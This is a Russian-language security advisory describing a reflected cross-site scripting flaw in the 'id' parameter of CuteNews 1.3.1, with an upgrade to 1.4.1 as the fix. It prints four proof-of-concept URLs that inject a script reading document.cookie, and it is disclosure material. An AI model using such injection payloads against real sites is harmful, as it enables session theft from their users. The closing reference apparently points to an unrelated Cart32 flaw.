Security Lab

Межсайтовый скриптинг в CuteNews

Дата публикации:29.06.2004
Дата изменения:26.01.2009
Всего просмотров:2825
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: CuteNews 1.x
Уязвимые версии: CuteNews 1.3.1

Описание: Уязвимость в CuteNews позволяет удаленному пользователю выполнить XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/show_archives.php?subaction=showcomments&id=<script>alert(document .cookie);</script>&archive=&start_from=&uca&p
http://[target]/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&uca t=&a
http://[target]/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>
http://[target]/example2.php?subaction=showfull&id=<script>alert(do cument.cookie);</script>

URL производителя: http://www.cutephp.com/

Решение: Установите последнюю версию 1.4.1 с сайта производителя.

Журнал изменений:

26.01.2009
Изменена секция «Решение», изменено описание уязвимости.

Ссылки: Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits